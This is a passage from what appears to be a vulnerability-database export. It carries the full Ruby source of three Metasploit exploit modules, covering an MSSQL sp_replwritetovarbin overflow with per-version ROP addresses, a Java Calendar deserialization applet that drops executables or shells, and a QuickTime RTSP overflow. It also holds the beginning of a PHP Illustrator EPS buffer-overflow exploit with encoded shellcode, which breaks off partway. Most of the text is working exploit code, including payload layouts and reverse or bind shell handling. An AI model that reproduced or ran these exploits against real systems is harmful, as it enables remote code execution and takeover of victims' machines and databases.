SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '50589' ],\n [ 'CVE', '2008-5416' ],\n [ 'BID', '32710' ],\n [ 'MSB', 'MS09-004' ],\n [ 'EDB', '7501' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\", # bad bytes get encoded!\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n # auto targeting!\n [ 'Automatic', { } ],\n\n #\n # Individual targets\n #\n [\n # Microsoft SQL Server 2000 - 8.00.194 (Intel X86)\n # Aug 6 2000 00:57:48\n 'MSSQL 2000 / MSDE SP0 (8.00.194)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]\n 'Disp' => 0x08, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x0071f5fb, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0041c9a2 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.384 (Intel X86)\n # May 23 2001 00:02:52\n 'MSSQL 2000 / MSDE SP1 (8.00.384)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004caa15 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.534 (Intel X86)\n # Nov 19 2001 13:23:50\n 'MSSQL 2000 / MSDE SP2 (8.00.534)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004ca984 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.760 (Intel X86)\n # Dec 17 2002 14:22:05\n 'MSSQL 2000 / MSDE SP3 (8.00.760)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0043fa97 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)\n # May 3 2005 23:18:38\n 'MSSQL 2000 / MSDE SP4 (8.00.2039)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]\n 'Disp' => 0x14, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0047c89d # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\n # Oct 14 2005 00:33:37\n 'MSSQL 2005 SP0 (9.00.1399.06)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]\n 'Disp' => 0x50, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x0147deb7, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x0112c2c7 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)\n # Apr 14 2006 01:12:25\n 'MSSQL 2005 SP1 (9.00.2047.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x011b204c # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)\n # Feb 9 2007 22:47:07\n 'MSSQL 2005 SP2 (9.00.3042.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x01849641, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x010a5379 # jmp esp\n },\n ],\n\n [ 'CRASHER', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2008'\n ))\n\n end\n\n def check\n # the ping to port 1434 method has two drawbacks...\n # #1, it doesn't work on mssql 2005 or newer (localhost only listening)\n # #2, it doesn't give an accurate version number (sp/os)\n\n # since we need to have credentials for this vuln, we just login and run a query\n # to get the version information\n if not (version = mssql_query_version())\n return Exploit::CheckCode::Safe\n end\n print_status(\"@@version returned:\\n\\t\" + version)\n\n # Any others?\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.194/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.384/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.534/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.760/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.2039/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.1399\\.06/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.2047\\.00/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.3042\\.00/)\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n mytarget = nil\n if target.name =~ /Automatic/\n print_status(\"Attempting automatic target detection...\")\n\n version = mssql_query_version\n fail_with(Failure::NoAccess, \"Unable to retrieve version information\") if not version\n\n if (version =~ /8\\.00\\.194/)\n mytarget = targets[1]\n elsif (version =~ /8\\.00\\.384/)\n mytarget = targets[2]\n elsif (version =~ /8\\.00\\.534/)\n mytarget = targets[3]\n elsif (version =~ /8\\.00\\.760/)\n mytarget = targets[4]\n elsif (version =~ /8\\.00\\.2039/)\n mytarget = targets[5]\n elsif (version =~ /9\\.00\\.1399\\.06/)\n mytarget = targets[6]\n elsif (version =~ /9\\.00\\.2047\\.00/)\n mytarget = targets[7]\n elsif (version =~ /9\\.00\\.3042\\.00/)\n mytarget = targets[8]\n end\n\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n else\n print_status(\"Automatically detected target \\\"#{mytarget.name}\\\"\")\n end\n else\n mytarget = target\n end\n\n sqlquery = %Q|declare @i int,@z nvarchar(4000)\nset @z='declare @e int,@b varbinary,@l int;'\nset @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'\nexec sp_executesql @z|\n\n # just crash it with a pattern buffer if the CRASHER target is selected..\n if mytarget.name == 'CRASHER'\n sploit = Rex::Text.pattern_create(2048)\n print_status(\"Attempting to corrupt memory to cause an exception!\")\n num = 32\n else\n # trigger the memory corruption\n num = mytarget['Num']\n vt_off = mytarget['VtOff']\n vt_disp = mytarget['VtDisp']\n vtable = mytarget['Vtable']\n ecx_disp = mytarget['Disp']\n esp_off = mytarget['Offset']\n hijack_esp = mytarget['ecx2esp']\n first_esp = mytarget['Popped']\n fix_esp = mytarget['FixESP']\n writable = mytarget['Writable']\n corruptable_bytes = 0x44\n\n # make sploit buff\n sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length\n #sploit = Rex::Text.pattern_create(sz)\n sploit = rand_text_alphanumeric(sz)\n\n # remove displacement! (using call [ecx+displacement])\n vtable_off = (num + vt_off)\n sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')\n\n # stack -> heap\n hijack_off = vtable_off + ecx_disp\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n # becomes eax on mssql 2ksp4 (prevent crash)\n sploit[(vtable_off-4),4] = [writable].pack('V')\n\n # becomes eip after esp hijack\n fixesp_off = vtable_off + first_esp\n sploit[fixesp_off,4] = [fix_esp].pack('V')\n\n # rest of magic stack (disable DEP?)\n stack_off = vtable_off + esp_off\n stack = []\n stack << mytarget['Ret']\n stack = stack.pack('V*')\n # jump over the stuff that gets corrupted\n stack << \"\\xeb\" + [corruptable_bytes].pack('C')\n stack << rand_text_alphanumeric(corruptable_bytes)\n stack << payload.encoded\n sploit[stack_off,stack.length] = stack\n\n # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n\n print_status(\"Redirecting flow to %#x via call to our faked vtable ptr @ %#x\" % [mytarget['FixDisp'], vtable])\n end\n\n # encode chars that get modified\n enc = mssql_encode_string(sploit)\n\n # put the number in (start offset)\n runme = sqlquery.gsub(/%NUM%/, num.to_s)\n runme.gsub!(/%STUFF%/, enc)\n\n # go!\n if !mssql_login_datastore\n fail_with(Failure::NoAccess, \"Unable to log in!\")\n end\n begin\n mssql_query(runme, datastore['VERBOSE'])\n rescue ::Errno::ECONNRESET, EOFError\n print_error(\"Error: #{$!}\")\n end\n\n handler\n disconnect\n end\n\n\n def mssql_str_to_chars(str)\n ret = \"\"\n str.unpack('C*').each do |ch|\n ret += \"+\" if ret.length > 0\n ret += \"char(\"\n ret << ch.to_s\n ret += \")\"\n end\n return ret\n end\n\n\n def mssql_encode_string(str)\n badchars = \"\\x00\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\"\n\n enc = \"\"\n in_str = true\n str.unpack('C*').each do |ch|\n # double-double single quotes\n if ch == 0x27\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 4\n next\n end\n\n # double backslashes\n if ch == 0x5c\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 2\n next\n end\n\n # convert any bad stuff to char(0xXX)\n if ((idx = badchars.index(ch.chr)))\n enc << \"'\" if in_str\n enc << \"+char(0x%x)\" % ch\n in_str = false\n else\n enc << \"+'\" if not in_str\n enc << ch.chr\n in_str = true\n end\n end\n enc << \"+'\" if not in_str\n return enc\n end\n\n\n def mssql_query_version\n begin\n logged_in = mssql_login_datastore\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR\n return nil\n end\n\n if !logged_in\n fail_with(Failure::NoAccess, \"Invalid SQL Server credentials\")\n end\n res = mssql_query(\"select @@version\", datastore['VERBOSE'])\n disconnect\n\n return nil if not res\n if res[:errors] and not res[:errors].empty?\n errstr = \"\"\n res[:errors].each do |err|\n errstr << err\n end\n fail_with(Failure::Unknown, errstr)\n end\n\n if not res[:rows] or res[:rows].empty?\n return nil\n end\n\n return res[:rows][0][0]\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb"}, {"lastseen": "2019-11-20T23:08:24", "bulletinFamily": "exploit", "description": "This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n", "modified": "2017-07-24T13:26:21", "published": "2009-12-06T05:50:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_CALENDAR_DESERIALIZE", "href": "", "type": "metasploit", "title": "Sun Java Calendar Deserialization Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n # Superceded by java_atomicreferencearray\n # include Msf::Exploit::Remote::BrowserAutopwn\n # autopwn_info({ :javascript => false })\n\n def initialize(info = {})\n super(\n update_info(info,\n 'Name' => 'Sun Java Calendar Deserialization Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n The payload can be either a native payload which is generated as an executable and\n dropped/executed on the target or a shell from within the Java applet in the target browser.\n\n The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sf', 'hdm' ],\n 'References' =>\n [\n [ 'CVE', '2008-5353' ],\n [ 'OSVDB', '50500'],\n [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],\n [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],\n [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]\n ],\n 'Platform' => %w(linux osx solaris win),\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 03 2008'\n )\n )\n end\n\n def exploit\n # load the static jar file\n path = File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2008-5353.jar\")\n fd = File.open(path, \"rb\")\n @jar_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n data = nil\n host = nil\n port = nil\n\n if !request.uri.match(/\\.jar$/i)\n if !request.uri.match(/\\/$/)\n send_redirect(cli, get_resource + '/', '')\n return\n end\n\n print_status(\"#{name} handling request\")\n\n payload = regenerate_payload(cli)\n if !payload\n print_error(\"Failed to generate the payload.\")\n return\n end\n\n if target.name == 'Generic (Java Payload)'\n if datastore['LHOST']\n jar = payload.encoded\n host = datastore['LHOST']\n port = datastore['LPORT']\n print_status(\"Payload will be a Java reverse shell\")\n else\n port = datastore['LPORT']\n host = cli.peerhost\n print_status(\"Payload will be a Java bind shell\")\n end\n if jar\n print_status(\"Generated jar to drop (#{jar.length} bytes).\")\n jar = Rex::Text.to_hex(jar, prefix = \"\")\n else\n print_error(\"Failed to generate the executable.\")\n return\n end\n else\n\n # NOTE: The EXE mixin automagically handles detection of arch/platform\n data = generate_payload_exe\n\n print_status(\"Generated executable to drop (#{data.length} bytes).\")\n data = Rex::Text.to_hex(data, prefix = \"\")\n\n end\n\n send_response_html(cli, generate_html(data, jar, host, port), 'Content-Type' => 'text/html')\n return\n end\n\n print_status(\"Sending Applet.jar\")\n send_response(cli, generate_jar, 'Content-Type' => \"application/octet-stream\")\n\n handler(cli)\n end\n\n def generate_html(data, jar, host, port)\n html = \"<html><head><title>Loading, Please Wait...</title></head>\"\n html += \"<body><center><p>Loading, Please Wait...</p></center>\"\n html += \"<applet archive=\\\"Applet.jar\\\" code=\\\"msf.x.AppletX.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\n html += \"<param name=\\\"data\\\" value=\\\"#{data}\\\"/>\" if data\n html += \"<param name=\\\"jar\\\" value=\\\"#{jar}\\\"/>\" if jar\n html += \"<param name=\\\"lhost\\\" value=\\\"#{host}\\\"/>\" if host\n html += \"<param name=\\\"lport\\\" value=\\\"#{port}\\\"/>\" if port\n html += \"</applet></body></html>\"\n html\n end\n\n def generate_jar\n @jar_data\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_calendar_deserialize.rb"}, {"lastseen": "2019-11-22T01:03:27", "bulletinFamily": "exploit", "description": "No module description\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-18T23:28:24", "id": "MSF:EXPLOIT/OSX/RTSP/QUICKTIME_RTSP_CONTENT_TYPE", "href": "", "type": "metasploit", "title": "MacOS X QuickTime RTSP Content-Type Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',\n # Description?\n 'Author' => 'unknown',\n 'Platform' => 'osx',\n 'References' =>\n [\n [ 'CVE', '2007-6166' ],\n [ 'OSVDB', '40876'],\n [ 'BID', '26549' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3841,\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n 'MaxNops' => 0,\n 'StackAdjustment' => -3500,\n },\n 'Targets' =>\n [\n [ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',\n {\n 'Arch' => ARCH_PPC,\n 'Ret' => 0x8fe3f88c,\n 'RetOffset' => 551,\n 'PayloadOffset' => 879\n }\n ],\n\n [ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',\n {\n 'Arch' => ARCH_PPC,\n 'Ret' => 0x8fe042e0,\n 'RetOffset' => 615,\n 'PayloadOffset' => 3351\n }\n ],\n\n [ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 307,\n 'Writable' => 0xa0bd0f10, # libSystem __IMPORT\n # The rest of these are all in libSystem __TEXT\n 'ret' => 0x9015d336,\n 'poppopret' => 0x9015d334,\n 'setjmp' => 0x900bc438,\n 'strdup' => 0x90012f40,\n 'jmp_eax' => 0x9014a77f\n }\n ],\n\n [ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 307,\n 'Writable' => 0x8fe66448, # dyld __IMPORT\n # The rest of these addresses are in dyld __TEXT\n 'ret' => 0x8fe1ceee,\n 'poppopret' => 0x8fe220d7,\n 'setjmp' => 0x8fe1ceb0,\n 'strdup' => 0x8fe1cd77,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n\n ],\n 'DefaultTarget' => 2,\n 'DisclosureDate' => 'Nov 23 2007'))\n end\n\n ######\n # XXX: This does not work on Tiger apparently\n def make_exec_payload_from_heap_stub()\n frag0 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x61\" + # popa\n \"\\xc3\" # ret\n\n frag1 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x89\\xe0\" + # mov eax, esp\n \"\\x83\\xc0\\x0c\" + # add eax, byte +0xc\n \"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax\n \"\\xc3\" # ret\n\n setjmp = target['setjmp']\n writable = target['Writable']\n strdup = target['strdup']\n jmp_eax = target['jmp_eax']\n\n exec_payload_from_heap_stub =\n frag0 +\n [setjmp].pack('V') +\n [writable + 32, writable].pack(\"V2\") +\n frag1 +\n \"X\" * 20 +\n [setjmp].pack('V') +\n [writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +\n \"X\" * 4\n end\n\n def on_client_connect(client)\n print_status(\"Got client connection...\")\n\n if (target['Arch'] == ARCH_PPC)\n ret_offset = target['RetOffset']\n payload_offset = target['PayloadOffset']\n\n # Create pattern sized up to payload, since it always follows\n # the return address.\n boom = Rex::Text.pattern_create(payload_offset)\n\n boom[ret_offset, 4] = [target['Ret']].pack('N')\n boom[payload_offset, payload.encoded.length] = payload.encoded\n else\n boom = Rex::Text.pattern_create(327)\n\n boom[307, 4] = [target['ret']].pack('V')\n boom[311, 4] = [target['ret']].pack('V')\n boom[315, 4] = [target['poppopret']].pack('V')\n boom[319, 4] = [target['Writable']].pack('V')\n boom[323, 4] = [target['Writable']].pack('V')\n\n #\n # Create exec-payload-from-heap-stub, but split it in two.\n # The first word must be placed as the overwritten saved ebp\n # in the attack string. The rest is placed after the\n # Writable memory addresses.\n #\n magic = make_exec_payload_from_heap_stub()\n boom[303, 4] = magic[0, 4]\n boom += magic[4..-1]\n\n #\n # Place the payload immediately after the stub as it expects\n #\n boom += payload.encoded\n end\n\n body = \" \"\n header =\n \"RTSP/1.0 200 OK\\r\\n\"+\n \"CSeq: 1\\r\\n\"+\n \"Content-Type: #{boom}\\r\\n\"+\n \"Content-Length: #{body.length}\\r\\n\\r\\n\"\n\n print_status(\"Sending RTSP response...\")\n client.put(header + body)\n\n print_status(\"Sleeping...\")\n select(nil,nil,nil,1)\n\n print_status(\"Starting handler...\")\n handler(client)\n\n print_status(\"Closing client...\")\n service.close_client(client)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb"}], "zdt": [{"lastseen": "2018-04-05T01:37:00", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-12-03T00:00:00", "published": "2009-12-03T00:00:00", "id": "1337DAY-ID-8172", "href": "https://0day.today/exploit/description/8172", "type": "zdt", "title": "Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) BOF exploit", "sourceData": "====================================================================================\r\nAdobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit\r\n====================================================================================\r\n\r\n\r\n# Title: Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit\r\n# CVE-ID: (2009-4195)\r\n# Author: pyrokinesis\r\n# Published: 2009-12-03\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n<?php\r\n /*\r\n Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\r\n overlong DSC Comment Buffer Overflow Exploit\r\n by Nine:Situations:Group::pyrokinesis\r\n site: http://retrogod.altervista.org/\r\n \r\n An overlong string as DSC comment (more than 42000 bytes)\r\n results in a direct EIP overwrite.\r\n Exception is first-chance so the program will never crash.\r\n At the moment of the redirection EAX and ESI are user-controlled.\r\n This portion of the buffer begins with '%' (it is the next DSC\r\n comment) but as you can see the resulting pattern is\r\n nop-equivalent.\r\n \r\n Tested and working against xp sp3\r\n change the call esi if you need, must be alphabetic\r\n I used a \"call esi\" from comctl32.dll on xp sp3,\r\n change if needed.\r\n \r\n Usage: php 9sg_illu.php\r\n then double-click on the resulting 9sg.eps file\r\n it will bind a shell on port 4444\r\n change the shellcode for your needs even.\r\n \r\n */\r\n \r\n # windows/adduser - 446 bytes\r\n # http://www.metasploit.com\r\n # Encoder: x86/alpha_mixed\r\n # EXITFUNC=seh, USER=adobe, PASS=kills\r\n $_scode_i = \"\\xda\\xc9\\xd9\\x74\\x24\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\r\n \"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\" .\r\n \"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\" .\r\n \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\" .\r\n \"\\x4a\\x49\\x4b\\x4c\\x4a\\x48\\x47\\x34\\x43\\x30\\x43\\x30\\x45\\x50\" .\r\n \"\\x4c\\x4b\\x47\\x35\\x47\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x43\\x48\" .\r\n \"\\x45\\x51\\x4a\\x4f\\x4c\\x4b\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\" .\r\n 